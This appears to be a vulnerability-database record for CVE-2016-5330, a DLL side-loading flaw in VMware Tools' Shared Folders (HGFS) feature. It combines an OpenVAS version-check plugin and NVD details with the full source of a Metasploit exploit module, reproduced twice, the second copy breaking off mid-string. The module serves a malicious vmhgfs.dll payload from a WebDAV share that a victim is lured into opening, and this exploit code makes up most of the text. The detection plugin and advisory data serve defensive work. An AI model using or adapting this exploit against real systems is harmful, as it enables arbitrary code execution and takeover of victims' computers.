ID OPENVAS:1361412562310809022 Type openvas Reporter Copyright (C) 2016 Greenbone Networks GmbH Modified 2019-07-05T00:00:00
Description
The host is installed with VMware Workstation
and is prone to a privilege escalation vulnerability.
###############################################################################
# OpenVAS Vulnerability Test
#
# VMware Workstation 'HGFS' Feature Privilege Escalation Vulnerability (Linux)
#
# Authors:
# Rinu Kuriakose <krinu@secpod.com>
#
# Copyright:
# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
CPE = "cpe:/a:vmware:workstation";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.809022");
script_version("2019-07-05T09:29:25+0000");
script_cve_id("CVE-2016-5330");
script_bugtraq_id(92323);
script_tag(name:"cvss_base", value:"4.4");
script_tag(name:"cvss_base_vector", value:"AV:L/AC:M/Au:N/C:P/I:P/A:P");
script_tag(name:"last_modification", value:"2019-07-05 09:29:25 +0000 (Fri, 05 Jul 2019)");
script_tag(name:"creation_date", value:"2016-09-01 10:20:57 +0530 (Thu, 01 Sep 2016)");
script_tag(name:"qod_type", value:"executable_version");
script_name("VMware Workstation 'HGFS' Feature Privilege Escalation Vulnerability (Linux)");
script_tag(name:"summary", value:"The host is installed with VMware Workstation
and is prone to a privilege escalation vulnerability.");
script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
script_tag(name:"insight", value:"The flaw is due to a DLL hijacking
vulnerability present in the VMware Tools 'Shared Folders' (HGFS) feature
running on Microsoft Windows.");
script_tag(name:"impact", value:"Successful exploitation will allow
local users to gain extra privileges.");
script_tag(name:"affected", value:"VMware Workstation version 12.1.x before
12.1.1 on Linux.");
script_tag(name:"solution", value:"Upgrade to VMware Workstation version
12.1.1 or later.");
script_tag(name:"solution_type", value:"VendorFix");
script_xref(name:"URL", value:"http://www.vmware.com/security/advisories/VMSA-2016-0010.html");
script_copyright("Copyright (C) 2016 Greenbone Networks GmbH");
script_category(ACT_GATHER_INFO);
script_family("General");
script_dependencies("gb_vmware_prdts_detect_lin.nasl");
script_mandatory_keys("VMware/Linux/Installed");
exit(0);
}
include("host_details.inc");
include("version_func.inc");
if(!vmwareVer = get_app_version(cpe:CPE)){
exit(0);
}
if(vmwareVer =~ "^(12\.1)")
{
if(version_is_less(version:vmwareVer, test_version:"12.1.1"))
{
report = report_fixed_ver(installed_version:vmwareVer, fixed_version:"12.1.1");
security_message(data:report);
exit(0);
}
}
{"id": "OPENVAS:1361412562310809022", "type": "openvas", "bulletinFamily": "scanner", "title": "VMware Workstation 'HGFS' Feature Privilege Escalation Vulnerability (Linux)", "description": "The host is installed with VMware Workstation\n and is prone to a privilege escalation vulnerability.", "published": "2016-09-01T00:00:00", "modified": "2019-07-05T00:00:00", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809022", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["http://www.vmware.com/security/advisories/VMSA-2016-0010.html"], "cvelist": ["CVE-2016-5330"], "lastseen": "2019-07-17T14:26:09", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-5330"]}, {"type": "zdt", "idList": ["1337DAY-ID-27418"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310809023", "OPENVAS:1361412562310809021", "OPENVAS:1361412562310809020", "OPENVAS:1361412562310809024", "OPENVAS:1361412562310809031", "OPENVAS:1361412562310105851"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/MISC/VMHGFS_WEBDAV_DLL_SIDELOAD"]}, {"type": "kaspersky", "idList": ["KLA10854"]}, {"type": "exploitdb", "idList": ["EDB-ID:41711"]}, {"type": "nessus", "idList": ["VMWARE_VMSA-2016-0010_REMOTE.NASL", "VMWARE_WORKSTATION_LINUX_VMSA_2016_0010.NASL", "MACOSX_FUSION_VMSA_2016_0010.NASL", "VMWARE_PLAYER_WIN_VMSA_2016_0010.NASL", "VMWARE_WORKSTATION_WIN_VMSA_2016_0010.NASL", "VMWARE_PLAYER_LINUX_VMSA_2016_0010.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:138289"]}, {"type": "vmware", "idList": ["VMSA-2016-0010"]}], "modified": "2019-07-17T14:26:09", "rev": 2}, "score": {"value": 5.6, "vector": "NONE", "modified": "2019-07-17T14:26:09", "rev": 2}, "vulnersScore": 5.6}, "pluginID": "1361412562310809022", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMware Workstation 'HGFS' Feature Privilege Escalation Vulnerability (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vmware:workstation\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809022\");\n script_version(\"2019-07-05T09:29:25+0000\");\n script_cve_id(\"CVE-2016-5330\");\n script_bugtraq_id(92323);\n script_tag(name:\"cvss_base\", value:\"4.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:29:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-09-01 10:20:57 +0530 (Thu, 01 Sep 2016)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"VMware Workstation 'HGFS' Feature Privilege Escalation Vulnerability (Linux)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with VMware Workstation\n and is prone to a privilege escalation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a DLL hijacking\n vulnerability present in the VMware Tools 'Shared Folders' (HGFS) feature\n running on Microsoft Windows.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n local users to gain extra privileges.\");\n\n script_tag(name:\"affected\", value:\"VMware Workstation version 12.1.x before\n 12.1.1 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to VMware Workstation version\n 12.1.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_vmware_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"VMware/Linux/Installed\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmwareVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(vmwareVer =~ \"^(12\\.1)\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"12.1.1\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"12.1.1\");\n security_message(data:report);\n exit(0);\n }\n}\n", "naslFamily": "General"}
{"cve": [{"lastseen": "2020-10-03T12:10:47", "description": "Untrusted search path vulnerability in the HGFS (aka Shared Folders) feature in VMware Tools 10.0.5 in VMware ESXi 5.0 through 6.0, VMware Workstation Pro 12.1.x before 12.1.1, VMware Workstation Player 12.1.x before 12.1.1, and VMware Fusion 8.1.x before 8.1.1 allows local users to gain privileges via a Trojan horse DLL in the current working directory.", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-08-08T01:59:00", "title": "CVE-2016-5330", "type": "cve", "cwe": ["CWE-426"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5330"], "modified": "2018-10-09T20:00:00", "cpe": ["cpe:/a:vmware:fusion:8.1", "cpe:/a:vmware:tools:10.0.5", "cpe:/o:vmware:esxi:6.0", "cpe:/o:vmware:esxi:5.0", "cpe:/a:vmware:workstation_player:12.1.1", "cpe:/a:vmware:workstation_player:12.1", "cpe:/a:vmware:fusion:8.1.1", "cpe:/o:vmware:esxi:5.5", "cpe:/a:vmware:workstation_pro:12.1", "cpe:/a:vmware:workstation_pro:12.1.1", "cpe:/o:vmware:esxi:5.1"], "id": "CVE-2016-5330", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5330", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmware:workstation_pro:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:8.1:*:*:*:*:mac_os_x:*:*", "cpe:2.3:a:vmware:workstation_player:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:5.1:*:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:5.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation_player:12.1:*:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:tools:10.0.5:*:*:*:*:windows:*:*", "cpe:2.3:a:vmware:fusion:8.1:*:*:*:*:*:*:*", "cpe:2.3:o:vmware:esxi:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation_pro:12.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:8.1.1:*:*:*:*:mac_os_x:*:*"]}], "exploitdb": [{"lastseen": "2017-03-23T13:17:20", "description": "VMware Host Guest Client Redirector - DLL Side Loading (Metasploit). CVE-2016-5330. Local exploit for Windows platform", "published": "2017-03-23T00:00:00", "type": "exploitdb", "title": "VMware Host Guest Client Redirector - DLL Side Loading (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5330"], "modified": "2017-03-23T00:00:00", "id": "EDB-ID:41711", "href": "https://www.exploit-db.com/exploits/41711/", "sourceData": "require 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector',\r\n 'Description' => %q{\r\n A DLL side loading vulnerability was found in the VMware Host Guest Client Redirector,\r\n a component of VMware Tools. This issue can be exploited by luring a victim into\r\n opening a document from the attacker's share. An attacker can exploit this issue to\r\n execute arbitrary code with the privileges of the target user. This can potentially\r\n result in the attacker taking complete control of the affected system. If the WebDAV\r\n Mini-Redirector is enabled, it is possible to exploit this issue over the internet.\r\n },\r\n 'Author' => 'Yorick Koster',\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2016-5330'],\r\n ['URL', 'https://securify.nl/advisory/SFY20151201/dll_side_loading_vulnerability_in_vmware_host_guest_client_redirector.html'],\r\n ['URL', 'http://www.vmware.com/in/security/advisories/VMSA-2016-0010.html'],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'Payload' => { 'Space' => 2048, },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows x64', {'Arch' => ARCH_X64,} ],\r\n [ 'Windows x86', {'Arch' => ARCH_X86,} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Aug 5 2016',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptPort.new('SRVPORT', [ true, \"The daemon port to listen on (do not change)\", 80 ]),\r\n OptString.new('URIPATH', [ true, \"The URI to use (do not change)\", \"/\" ]),\r\n OptString.new('BASENAME', [ true, \"The base name for the docx file\", \"Document1\" ]),\r\n OptString.new('SHARENAME', [ true, \"The name of the top-level share\", \"documents\" ])\r\n ], self.class)\r\n\r\n # no SSL\r\n deregister_options('SSL', 'SSLVersion', 'SSLCert')\r\n end\r\n\r\n\r\n def on_request_uri(cli, request)\r\n case request.method\r\n when 'OPTIONS'\r\n process_options(cli, request)\r\n when 'PROPFIND'\r\n process_propfind(cli, request)\r\n when 'GET'\r\n process_get(cli, request)\r\n else\r\n print_status(\"#{request.method} => 404 (#{request.uri})\")\r\n resp = create_response(404, \"Not Found\")\r\n resp.body = \"\"\r\n resp['Content-Type'] = 'text/html'\r\n cli.send_response(resp)\r\n end\r\n end\r\n\r\n\r\n def process_get(cli, request)\r\n myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n webdav = \"\\\\\\\\#{myhost}\\\\\"\r\n\r\n if (request.uri =~ /vmhgfs\\.dll$/i)\r\n print_status(\"GET => DLL Payload (#{request.uri})\")\r\n return if ((p = regenerate_payload(cli)) == nil)\r\n data = generate_payload_dll({ :arch => target['Arch'], :code => p.encoded })\r\n send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\r\n return\r\n end\r\n\r\n if (request.uri =~ /\\.docx$/i)\r\n print_status(\"GET => DOCX (#{request.uri})\")\r\n send_response(cli, \"\", { 'Content-Type' => 'application/vnd.openxmlformats-officedocument.wordprocessingml.document' })\r\n return\r\n end\r\n\r\n if (request.uri[-1,1] == \"/\" or request.uri =~ /index\\.html?$/i)\r\n print_status(\"GET => REDIRECT (#{request.uri})\")\r\n resp = create_response(200, \"OK\")\r\n resp.body = %Q|<html><head><meta http-equiv=\"refresh\" content=\"0;URL=file:\\\\\\\\#{@exploit_unc}#{datastore['SHARENAME']}\\\\#{datastore['BASENAME']}.docx\"></head><body></body></html>|\r\n resp['Content-Type'] = 'text/html'\r\n cli.send_response(resp)\r\n return\r\n end\r\n\r\n print_status(\"GET => 404 (#{request.uri})\")\r\n resp = create_response(404, \"Not Found\")\r\n resp.body = \"\"\r\n cli.send_response(resp)\r\n end\r\n\r\n #\r\n # OPTIONS requests sent by the WebDav Mini-Redirector\r\n #\r\n def process_options(cli, request)\r\n print_status(\"OPTIONS #{request.uri}\")\r\n headers = {\r\n 'MS-Author-Via' => 'DAV',\r\n 'DASL' => '<DAV:sql>',\r\n 'DAV' => '1, 2',\r\n 'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',\r\n 'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',\r\n 'Cache-Control' => 'private'\r\n }\r\n resp = create_response(207, \"Multi-Status\")\r\n headers.each_pair {|k,v| resp[k] = v }\r\n resp.body = \"\"\r\n resp['Content-Type'] = 'text/xml'\r\n cli.send_response(resp)\r\n end\r\n\r\n #\r\n # PROPFIND requests sent by the WebDav Mini-Redirector\r\n #\r\n def process_propfind(cli, request)\r\n path = request.uri\r\n print_status(\"PROPFIND #{path}\")\r\n body = ''\r\n\r\n my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n my_uri = \"http://#{my_host}/\"\r\n\r\n if path !~ /\\/$/\r\n\r\n if blacklisted_path?(path)\r\n print_status \"PROPFIND => 404 (#{path})\"\r\n resp = create_response(404, \"Not Found\")\r\n resp.body = \"\"\r\n cli.send_response(resp)\r\n return\r\n end\r\n\r\n if path.index(\".\")\r\n print_status \"PROPFIND => 207 File (#{path})\"\r\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype/>\r\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\r\n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>\r\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<lp2:executable>T</lp2:executable>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n</D:multistatus>\r\n|\r\n # send the response\r\n resp = create_response(207, \"Multi-Status\")\r\n resp.body = body\r\n resp['Content-Type'] = 'text/xml; charset=\"utf8\"'\r\n cli.send_response(resp)\r\n return\r\n else\r\n print_status \"PROPFIND => 301 (#{path})\"\r\n resp = create_response(301, \"Moved\")\r\n resp[\"Location\"] = path + \"/\"\r\n resp['Content-Type'] = 'text/html'\r\n cli.send_response(resp)\r\n return\r\n end\r\n end\r\n\r\n print_status \"PROPFIND => 207 Directory (#{path})\"\r\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\r\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\r\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n|\r\n\r\n if request[\"Depth\"].to_i > 0\r\n trail = path.split(\"/\")\r\n trail.shift\r\n case trail.length\r\n when 0\r\n body << generate_shares(path)\r\n when 1\r\n body << generate_files(path)\r\n end\r\n else\r\n print_status \"PROPFIND => 207 Top-Level Directory\"\r\n end\r\n\r\n body << \"</D:multistatus>\"\r\n\r\n body.gsub!(/\\t/, '')\r\n\r\n # send the response\r\n resp = create_response(207, \"Multi-Status\")\r\n resp.body = body\r\n resp['Content-Type'] = 'text/xml; charset=\"utf8\"'\r\n cli.send_response(resp)\r\n end\r\n\r\n def generate_shares(path)\r\n share_name = datastore['SHARENAME']\r\n%Q|\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}#{share_name}/</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\r\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\r\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n|\r\n end\r\n\r\n def generate_files(path)\r\n trail = path.split(\"/\")\r\n return \"\" if trail.length < 2\r\n\r\n %Q|\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}#{datastore['BASENAME']}.docx</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype/>\r\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\r\n<lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength>\r\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<lp2:executable>T</lp2:executable>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n|\r\n end\r\n\r\n def gen_timestamp(ttype=nil)\r\n ::Time.now.strftime(\"%a, %d %b %Y %H:%M:%S GMT\")\r\n end\r\n\r\n def gen_datestamp(ttype=nil)\r\n ::Time.now.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\r\n end\r\n\r\n # This method rejects requests that are known to break exploitation\r\n def blacklisted_path?(uri)\r\n return true if uri =~ /\\.exe/i\r\n return true if uri =~ /\\.(config|manifest)/i\r\n return true if uri =~ /desktop\\.ini/i\r\n return true if uri =~ /lib.*\\.dll/i\r\n return true if uri =~ /\\.tmp$/i\r\n return true if uri =~ /(pcap|packet)\\.dll/i\r\n false\r\n end\r\n\r\n def exploit\r\n\r\n myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']\r\n\r\n @exploit_unc = \"\\\\\\\\#{myhost}\\\\\"\r\n\r\n if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'\r\n fail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')\r\n end\r\n\r\n print_status(\"Files are available at #{@exploit_unc}#{datastore['SHARENAME']}\")\r\n\r\n super\r\n end\r\nend", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/41711/"}], "zdt": [{"lastseen": "2018-01-06T07:02:35", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2017-03-25T00:00:00", "title": "VMware Host Guest Client Redirector - DLL Side Loading Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5330"], "modified": "2017-03-25T00:00:00", "href": "https://0day.today/exploit/description/27418", "id": "1337DAY-ID-27418", "sourceData": "require 'msf/core'\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::EXE\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector',\r\n 'Description' => %q{\r\n A DLL side loading vulnerability was found in the VMware Host Guest Client Redirector,\r\n a component of VMware Tools. This issue can be exploited by luring a victim into\r\n opening a document from the attacker's share. An attacker can exploit this issue to\r\n execute arbitrary code with the privileges of the target user. This can potentially\r\n result in the attacker taking complete control of the affected system. If the WebDAV\r\n Mini-Redirector is enabled, it is possible to exploit this issue over the internet.\r\n },\r\n 'Author' => 'Yorick Koster',\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2016-5330'],\r\n ['URL', 'https://securify.nl/advisory/SFY20151201/dll_side_loading_vulnerability_in_vmware_host_guest_client_redirector.html'],\r\n ['URL', 'http://www.vmware.com/in/security/advisories/VMSA-2016-0010.html'],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'Payload' => { 'Space' => 2048, },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows x64', {'Arch' => ARCH_X64,} ],\r\n [ 'Windows x86', {'Arch' => ARCH_X86,} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Aug 5 2016',\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptPort.new('SRVPORT', [ true, \"The daemon port to listen on (do not change)\", 80 ]),\r\n OptString.new('URIPATH', [ true, \"The URI to use (do not change)\", \"/\" ]),\r\n OptString.new('BASENAME', [ true, \"The base name for the docx file\", \"Document1\" ]),\r\n OptString.new('SHARENAME', [ true, \"The name of the top-level share\", \"documents\" ])\r\n ], self.class)\r\n \r\n # no SSL\r\n deregister_options('SSL', 'SSLVersion', 'SSLCert')\r\n end\r\n \r\n \r\n def on_request_uri(cli, request)\r\n case request.method\r\n when 'OPTIONS'\r\n process_options(cli, request)\r\n when 'PROPFIND'\r\n process_propfind(cli, request)\r\n when 'GET'\r\n process_get(cli, request)\r\n else\r\n print_status(\"#{request.method} => 404 (#{request.uri})\")\r\n resp = create_response(404, \"Not Found\")\r\n resp.body = \"\"\r\n resp['Content-Type'] = 'text/html'\r\n cli.send_response(resp)\r\n end\r\n end\r\n \r\n \r\n def process_get(cli, request)\r\n myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n webdav = \"\\\\\\\\#{myhost}\\\\\"\r\n \r\n if (request.uri =~ /vmhgfs\\.dll$/i)\r\n print_status(\"GET => DLL Payload (#{request.uri})\")\r\n return if ((p = regenerate_payload(cli)) == nil)\r\n data = generate_payload_dll({ :arch => target['Arch'], :code => p.encoded })\r\n send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\r\n return\r\n end\r\n \r\n if (request.uri =~ /\\.docx$/i)\r\n print_status(\"GET => DOCX (#{request.uri})\")\r\n send_response(cli, \"\", { 'Content-Type' => 'application/vnd.openxmlformats-officedocument.wordprocessingml.document' })\r\n return\r\n end\r\n \r\n if (request.uri[-1,1] == \"/\" or request.uri =~ /index\\.html?$/i)\r\n print_status(\"GET => REDIRECT (#{request.uri})\")\r\n resp = create_response(200, \"OK\")\r\n resp.body = %Q|<html><head><meta http-equiv=\"refresh\" content=\"0;URL=file:\\\\\\\\#{@exploit_unc}#{datastore['SHARENAME']}\\\\#{datastore['BASENAME']}.docx\"></head><body></body></html>|\r\n resp['Content-Type'] = 'text/html'\r\n cli.send_response(resp)\r\n return\r\n end\r\n \r\n print_status(\"GET => 404 (#{request.uri})\")\r\n resp = create_response(404, \"Not Found\")\r\n resp.body = \"\"\r\n cli.send_response(resp)\r\n end\r\n \r\n #\r\n # OPTIONS requests sent by the WebDav Mini-Redirector\r\n #\r\n def process_options(cli, request)\r\n print_status(\"OPTIONS #{request.uri}\")\r\n headers = {\r\n 'MS-Author-Via' => 'DAV',\r\n 'DASL' => '<DAV:sql>',\r\n 'DAV' => '1, 2',\r\n 'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',\r\n 'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, 